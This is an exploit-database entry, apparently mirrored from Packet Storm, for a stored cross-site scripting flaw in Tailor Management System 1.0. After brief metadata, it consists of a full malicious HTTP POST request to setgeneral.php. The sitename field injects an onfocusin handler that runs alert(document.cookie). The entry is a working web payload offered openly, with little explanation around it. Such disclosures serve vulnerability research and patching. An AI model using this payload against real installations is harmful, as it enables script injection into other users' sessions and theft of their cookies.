Share
## https://sploitus.com/exploit?id=PACKETSTORM:158895
# Title: Tailor Management System 1.0 - Stored Cross-Site Scripting  
# Exploit Author: Ahmed Abbas  
# Date: 2020-08-09  
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL  
# Version: 1.0  
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4  
  
# Malicious POST Request to http://TARGET  
POST /tailor/setgeneral.php HTTP/1.1  
Host: 192.168.152.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.152.1/tailor/setgeneral.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 133  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=2blcdl295pe64o39eavobmmb0h  
Upgrade-Insecure-Requests: 1  
  
sitename=%22autofocus+onfocusin%3Dalert%28document.cookie%29+%22%22&mobile=6000000&email=test%40email.com&currency=as&sms=as